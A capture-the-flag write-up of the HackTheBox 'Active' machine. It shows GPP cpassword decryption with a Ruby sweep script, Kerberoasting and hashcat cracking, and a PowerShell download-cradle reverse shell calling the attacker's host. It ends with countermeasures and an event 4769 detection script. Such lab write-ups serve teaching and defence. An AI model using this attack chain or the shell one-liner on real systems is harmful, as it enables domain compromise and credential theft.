Contents

HackTheBox - Active

Active

/images/htb-active/active.png

Machine Release Date: July 28, 2018

Skills Learned

  • Active Directory Enumeration
  • SMB Enumeration
  • Active Directory groups.xml Decryption
  • Kerberoasting
  • Hash Cracking

Active Ports

sudo nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49157,49158,49169,49171,49182 -T4 -sC -sV -oA nmap/full-tcp-version 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.036s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-10 19:30:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m50s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-09-10T19:31:19
|_  start_date: 2020-09-10T19:27:31

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 10 15:30:33 2020 -- 1 IP address (1 host up) scanned in 188.70 seconds

SMB Enumeration (Sensitive Groups.xml leaked from SYSVOL Replication)

I was able to list SMB shares with anonymous access:

$ smbclient -N -L //10.10.10.100/
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
SMB1 disabled -- no workgroup available

smbclient was the only tool that listed the shares for me without credentials, and of these only the Replication share was readable anonymously. Its contents are a copy of SYSVOL (the same active.htb\Policies tree), so I mirrored it to my Kali machine:

$ smbclient -N //10.10.10.100/Replication
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.6 KiloBytes/sec) (average 1.7 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.7 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (14.6 KiloBytes/sec) (average 4.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 3.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (11.0 KiloBytes/sec) (average 4.9 KiloBytes/sec)
smb: \> exit

I then grepped the mirrored files recursively for password-like strings:

$ grep -RiE 'pwd|passw' *
Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

The Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml file is a Group Policy Preferences (GPP) item and carries a cpassword attribute for the active.htb\SVC_TGS account. GPP encrypts that value with AES-256, but Microsoft published the static key in its own MS-GPPREF documentation, so anyone who can read the file can recover the password (this is the issue MS14-025 addressed by removing the ability to set passwords through GPP). I modified the ruby script from this site to decrypt the password:

$ ruby decrypt-groupscpassword.rb
decrypt-groupscpassword.rb:14: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
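The decryption that script performs, as an added example written for this writeup (not the author's script and not Microsoft's code): it restores the base64 padding GPP strips, decrypts with the AES-256 key Microsoft published and an all-zero IV, and decodes the UTF-16LE result. The Groups.xml snippet is the one from the grep output above; the XML parsing is added here so the same routine can be run over every cpassword found in a SYSVOL mirror. Only the Ruby standard library is used.

```ruby
require 'base64'
require 'openssl'
require 'rexml/document'

# AES-256 key Microsoft published in the MS-GPPREF documentation (the reason MS14-025 exists)
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

def decrypt_cpassword(cpassword)
  # GPP strips the '=' padding from the base64 value; restore it before decoding
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  ciphertext = Base64.decode64(padded)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_KEY
  cipher.iv = "\x00" * 16                           # fixed all-zero IV
  plain = cipher.update(ciphertext) + cipher.final  # PKCS#7 padding removed by OpenSSL
  plain.force_encoding('UTF-16LE').encode('UTF-8')  # GPP stores the password as UTF-16LE
end

# Walk a GPP XML document (Groups.xml, Services.xml, ScheduledTasks.xml, ...) and
# decrypt every cpassword attribute it contains.
def extract_gpp_credentials(xml)
  doc = REXML::Document.new(xml)
  REXML::XPath.match(doc, '//Properties[@cpassword]').map do |props|
    { user: props.attributes['userName'],
      password: decrypt_cpassword(props.attributes['cpassword']) }
  end
end

# The Groups.xml found on the Replication share, reformatted for readability.
GROUPS_XML = <<~'XML'
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
          changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
      <Properties action="U" newName="" fullName="" description=""
                  cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                  changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                  userName="active.htb\SVC_TGS"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  extract_gpp_credentials(GROUPS_XML).each { |c| puts "#{c[:user]}:#{c[:password]}" }
end
```

Pointing extract_gpp_credentials at every *.xml under a mirrored Policies tree is the practical way to sweep a domain for leftover GPP passwords; the cpassword attribute is the only thing the routine needs, whatever preference type the file holds.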

At this point, the password for the SVC_TGS user should be GPPstillStandingStrong2k18. I verified that I could login as that user:

$ cme smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18

Command execution over SMB needs local administrator rights on the target, and it failed with this account, so I listed the shares again to see what the new credentials could reach:

$ smbmap -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: 10.10.10.100
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share
        Users                                                   READ ONLY

Great! Now I should be able to access the Users share!

sudo mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/Users Users

After mounting the Users share, I was able to enumerate it for the user.txt flag:

kali@kali:~/htb/boxes/active/smb$ find Users/ -name user.txt -ls 2>/dev/null
      131      1 -rwxr-xr-x   1 root     root           34 Jul 21  2018 Users/SVC_TGS/Desktop/user.txt
kali@kali:~/htb/boxes/active/smb$ cat Users/SVC_TGS/Desktop/user.txt
86d67d8ba232bb6a254aa4d10159e983

Privilege Escalation (Kerberoasting the Service Account)

Browsing the shares readable by SVC_TGS turned up nothing else of interest. With valid domain credentials, however, I could bind to LDAP and dump the whole active.htb domain naming context:

ldapsearch -x -h 10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' > active.htb

Being able to query the directory meant I could look specifically for user accounts that have a service principal name (SPN) set, which is the precondition for Kerberoasting:

$ ldapsearch -x -h 10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' '(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))'
# extended LDIF
#
# LDAPv3
# base <dc=active,dc=htb> with scope subtree
# filter: (&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))
# requesting: ALL
#

# Administrator, Users, active.htb
dn: CN=Administrator,CN=Users,DC=active,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Administrator
description: Built-in account for administering the computer/domain
distinguishedName: CN=Administrator,CN=Users,DC=active,DC=htb
instanceType: 4
whenCreated: 20180718184911.0Z
whenChanged: 20200910202350.0Z
uSNCreated: 8196
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
memberOf: CN=Domain Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Enterprise Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Schema Admins,CN=Users,DC=active,DC=htb
memberOf: CN=Administrators,CN=Builtin,DC=active,DC=htb
uSNChanged: 90160
name: Administrator
objectGUID:: jnHKJRJzf0aVWkxPEJY8Hg==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 131774446554773106
lastLogoff: 0
lastLogon: 131774446606565197
logonHours:: ////////////////////////////
pwdLastSet: 131764144003517228
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAArxktGAS1AL49Gv129AEAAA==
adminCount: 1
accountExpires: 0
logonCount: 33
sAMAccountName: Administrator
sAMAccountType: 805306368
servicePrincipalName: active/CIFS:445
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20180718203435.0Z
dSCorePropagationData: 20180718201454.0Z
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132442430302623697
msDS-SupportedEncryptionTypes: 0

# krbtgt, Users, active.htb
dn: CN=krbtgt,CN=Users,DC=active,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: krbtgt
description: Key Distribution Center Service Account
distinguishedName: CN=krbtgt,CN=Users,DC=active,DC=htb
instanceType: 4
whenCreated: 20180718185035.0Z
whenChanged: 20180718190545.0Z
uSNCreated: 12324
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=active,DC=htb
uSNChanged: 12739
showInAdvancedViewOnly: TRUE
name: krbtgt
objectGUID:: 56HXQ6alq0mC0OJOdHL4jQ==
userAccountControl: 514
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 131764134369720307
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAArxktGAS1AL49Gv129gEAAA==
adminCount: 1
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: krbtgt
sAMAccountType: 805306368
servicePrincipalName: kadmin/changepw
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=active,DC=htb
isCriticalSystemObject: TRUE
dSCorePropagationData: 20180718190545.0Z
dSCorePropagationData: 16010101000000.0Z

# search reference
ref: ldap://ForestDnsZones.active.htb/DC=ForestDnsZones,DC=active,DC=htb

# search reference
ref: ldap://DomainDnsZones.active.htb/DC=DomainDnsZones,DC=active,DC=htb

# search reference
ref: ldap://active.htb/CN=Configuration,DC=active,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 6
# numEntries: 2
# numReferences: 3

In the output above, both the Administrator and krbtgt accounts are user accounts with an SPN. Any authenticated domain user can ask the KDC for a TGS (service) ticket for an SPN, and the ticket's encrypted part is protected with the long-term key of the account that owns the SPN. For RC4-HMAC (etype 23) that key is simply the NT hash of the account's password, so the ticket can be taken offline and brute-forced with no further traffic to the DC; a successful crack yields the service account's cleartext password. This attack is known as Kerberoasting. krbtgt is not a useful target here: it is disabled (userAccountControl 514 above) and GetUserSPNs skips disabled accounts, which leaves the Administrator account with the active/CIFS:445 SPN.

I used the GetUserSPNs.py script from the impacket suite to achieve this:

$ python3 ~/tools/impacket/examples/GetUserSPNs.py -dc-ip 10.10.10.100 -outputfile active.tgsrep active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.9.22.dev1+20200826.101917.9485b0c2 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520

The hash from the TGS was saved in the active.tgsrep file. I then searched for the proper mode to run hashcat in so that I could crack it:

kali@kali:~/htb/boxes/active/kerberos$ ls
active.tgs
kali@kali:~/htb/boxes/active/kerberos$ less active.tgs
kali@kali:~/htb/boxes/active/kerberos$ hashcat --example-hashes | grep -iC1 'tgs'
MODE: 13100
TYPE: Kerberos 5, etype 23, TGS-REP
HASH: $krb5tgs$23$*user$realm$test/spn*$b548e10f5694ae018d7ad63c257af7dc$35e8e45658860bc31a859b41a08989265f4ef8afd75652ab4d7a30ef151bf6350d879ae189a8cb769e01fa573c6315232b37e4bcad9105520640a781e5fd85c09615e78267e494f433f067cc6958200a82f70627ce0eebc2ac445729c2a8a0255dc3ede2c4973d2d93ac8c1a56b26444df300cb93045d05ff2326affaa3ae97f5cd866c14b78a459f0933a550e0b6507bf8af27c2391ef69fbdd649dd059a4b9ae2440edd96c82479645ccdb06bae0eead3b7f639178a90cf24d9a
PASS: hashcat
--
MODE: 19600
TYPE: Kerberos 5, etype 17, TGS-REP
HASH: $krb5tgs$17$srv_http$synacktiv.local$849e31b3db1c1f203fa20b85$948690f5875125348286ad3346d27b43eaabc71896b620c16de7ddcdbd561628c650c508856a3f574261948b6db4b48332d30536e978046a423ad4368f9a69b4dc4642dab4e0d475d8299be718fd6f98ac85a771b457b2453e78c9411dfce572b19660fe7a5a8246d9b2a91ea2f14d1986ea0a77ecf9b8330bc8fd9ab540bcf46b74c5aa7005cfccd89ec05f66aeab30c6b2bf8595cf6c9a1b68ad885258850c4b1dd9265f270fb2af52fd76c16246df51ea67efc58a65c345686c84e43642febe908a
PASS: hashcat
--
MODE: 19700
TYPE: Kerberos 5, etype 18, TGS-REP
HASH: $krb5tgs$18$srv_http$synacktiv.local$16ce51f6eba20c8ee534ff8a$57d07b23643a516834795f0c010da8f549b7e65063e5a367ca9240f9b800adad1734df7e7d5dd8307e785de4f40aacf901df41aa6ce695f8619ec579c1fa57ee93661cf402aeef4e3a42e7e3477645d52c09dc72feade03512dffe0df517344f673c63532b790c242cc1d50f4b4b34976cb6e08ab325b3aefb2684262a5ee9faacb14d059754f50553be5bfa5c4c51e833ff2b6ac02c6e5d4c4eb193e27d7dde301bd1ddf480e5e282b8c27ef37b136c8f140b56de105b73adeb1de16232fa1ab5c9f6
PASS: hashcat

In this case the mode is 13100: the ticket came back with etype 23 (RC4-HMAC), as the $krb5tgs$23$ prefix shows, which is expected because the Administrator account has msDS-SupportedEncryptionTypes set to 0 (no AES-only restriction) in the LDAP output above. RC4 tickets are the cheapest to crack; AES tickets (etype 17/18, modes 19600/19700) cost thousands of PBKDF2 iterations per guess.

PS D:\hashcat\hashcat-6.0.0> .\hashcat.exe -a 0 -m 13100 ..\hashes\active.kerberoast ..\wordlists\rockyou.txt
hashcat (v6.0.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #3: Unstable OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650 with Max-Q Design, 3323/4096 MB, 16MCU

OpenCL API (OpenCL 1.2 CUDA 11.0.208) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650 with Max-Q Design, skipped

OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) UHD Graphics 630, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 345 MB

Dictionary cache hit:
* Filename..: ..\wordlists\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$e5e625443e6088697a4d053026dc6a99$[...]:Ticketmaster1968

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...ac3289
Time.Started.....: Thu Sep 10 17:18:56 2020 (3 secs)
Time.Estimated...: Thu Sep 10 17:18:59 2020 (0 secs)
Guess.Base.......: File (..\wordlists\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4220.0 kH/s (8.20ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10747904/14344385 (74.93%)
Rejected.........: 0/10747904 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> PINKPIGS
Hardware.Mon.#1..: Temp: 53c Util: 39% Core:1875MHz Mem:3500MHz Bus:16

Started: Thu Sep 10 17:18:48 2020
Stopped: Thu Sep 10 17:18:59 2020

At this point I had the Administrator's password, Ticketmaster1968. Because that account is a local administrator on the DC, crackmapexec can execute commands over SMB with -X; I used it to run a PowerShell one-liner that downloads Invoke-PowerShellTcp.ps1 from the nishang post-exploitation framework off my Kali machine and executes it, which connects back to an ncat listener with a PowerShell session running as Administrator:

$ sudo crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968 -X 'iex(New-Object System.Net.WebClient).DownloadString("http://10.10.14.24:8000/Invoke-PowerShellTcp.ps1")'
SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] ACTIVE\Administrator:Ticketmaster1968 (Pwn3d!)
$ rlwrap ncat -nlvp 2001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2001
Ncat: Listening on 0.0.0.0:2001
Ncat: Connection from 10.10.10.100.
Ncat: Connection from 10.10.10.100:52363.

Windows PowerShell running as user Administrator on DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\> whoami
active\administrator
PS C:\> cd Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> gc root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

As seen above, I was able to access the root.txt, indicating a full compromise of the system.

Countermeasures

  • Do not store credentials in Group Policy Preferences. Install the MS14-025 update (KB2962486) so that passwords can no longer be set through GPP, and search SYSVOL (and any copies of it, such as the Replication share here) for cpassword= and delete what you find. Tightening permissions is not a substitute: every domain user must be able to read SYSVOL for Group Policy to apply, so any cpassword left there is readable by the whole domain. Anonymous read access to a SYSVOL copy, as on this box, should never exist.
  • Set long, random passwords for service accounts (at least 28 random alphanumeric and special characters), or better, use Group Managed Service Accounts (gMSA), whose passwords are long, random and rotated automatically.
  • Never register SPNs on privileged accounts; here the built-in Administrator account carried active/CIFS:445. Run services under dedicated, low-privileged accounts and keep those accounts out of administrative groups.
  • Enable AES for service accounts (msDS-SupportedEncryptionTypes) so that service tickets are not issued with RC4-HMAC (etype 23), which is by far the cheapest ticket type to crack.
  • Configure logging to detect Kerberoasting activity by enabling the Audit Kerberos Service Ticket Operations feature. Each service ticket request is then recorded as event ID 4769 with its TicketEncryptionType; a burst of 0x17 (RC4) requests for user-account SPNs from a single account is the classic indicator. You can read more about it here.
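A minimal form of the detection logic the last bullet calls for, as an added example and not code from the writeup: it runs over a handful of constructed event 4769 records and reports which accounts obtained RC4-HMAC (0x17) service tickets for user accounts, ignoring machine accounts (names ending in $), krbtgt (logged for TGT renewals) and failed requests. The field names TargetUserName, ServiceName, TicketEncryptionType and Status are the real EventData fields of event 4769; the values are made up to mirror this box.

```ruby
RC4_HMAC = '0x17' # TicketEncryptionType value for RC4-HMAC (Kerberos etype 23)

# Constructed sample of event 4769 records (EventData fields only), made up for this
# example to mirror the box; not real log output.
SAMPLE_4769 = [
  # SVC_TGS pulls an RC4 ticket for the Administrator account's SPN: the Kerberoast
  { 'TargetUserName' => 'SVC_TGS@ACTIVE.HTB', 'ServiceName' => 'Administrator',
    'TicketEncryptionType' => '0x17', 'Status' => '0x0', 'IpAddress' => '::ffff:10.10.14.24' },
  # normal machine-account traffic with AES256 (0x12)
  { 'TargetUserName' => 'DC$@ACTIVE.HTB', 'ServiceName' => 'DC$',
    'TicketEncryptionType' => '0x12', 'Status' => '0x0', 'IpAddress' => '::ffff:10.10.10.100' },
  # TGT renewal: ServiceName is krbtgt, not a roastable service account
  { 'TargetUserName' => 'SVC_TGS@ACTIVE.HTB', 'ServiceName' => 'krbtgt',
    'TicketEncryptionType' => '0x17', 'Status' => '0x0', 'IpAddress' => '::ffff:10.10.14.24' },
  # failed request (0x7 = KDC_ERR_S_PRINCIPAL_UNKNOWN): no ticket material was issued
  { 'TargetUserName' => 'SVC_TGS@ACTIVE.HTB', 'ServiceName' => 'sqlsvc',
    'TicketEncryptionType' => '0x17', 'Status' => '0x7', 'IpAddress' => '::ffff:10.10.14.24' },
  # a repeat request for the same SPN should not count as a second service account
  { 'TargetUserName' => 'SVC_TGS@ACTIVE.HTB', 'ServiceName' => 'Administrator',
    'TicketEncryptionType' => '0x17', 'Status' => '0x0', 'IpAddress' => '::ffff:10.10.14.24' },
]

# An event is interesting when an RC4 ticket was actually issued for a user account.
def kerberoast_candidate?(ev)
  ev['TicketEncryptionType'].casecmp?(RC4_HMAC) &&  # RC4: crackable with hashcat mode 13100
    ev['Status'] == '0x0' &&                        # request succeeded, a ticket was returned
    !ev['ServiceName'].end_with?('$') &&            # machine accounts have random 120-char passwords
    !ev['ServiceName'].casecmp?('krbtgt')           # TGT renewals also log ServiceName=krbtgt
end

# Map each requesting account to the distinct service accounts it obtained RC4 tickets for.
def rc4_tgs_by_requester(events)
  events.select { |ev| kerberoast_candidate?(ev) }
        .group_by { |ev| ev['TargetUserName'] }
        .transform_values { |evs| evs.map { |ev| ev['ServiceName'] }.uniq.sort }
end

# Flag requesters that pulled RC4 tickets for at least `threshold` distinct service accounts.
# In a domain that still has RC4 traffic, raise the threshold so only bulk requests alert.
def kerberoast_alerts(events, threshold: 1)
  rc4_tgs_by_requester(events).select { |_, spns| spns.length >= threshold }
end

if __FILE__ == $PROGRAM_NAME
  kerberoast_alerts(SAMPLE_4769).each do |requester, spns|
    puts "#{requester} obtained RC4 service tickets for: #{spns.join(', ')}"
  end
end
```

In practice the records would come from the DC's Security log (for example Get-WinEvent with an XPath filter on EventID 4769), and the threshold would be tuned to the domain: once AES is enabled everywhere, any RC4 ticket for a user-account SPN is worth a look, whereas a mixed domain needs the volume-based rule.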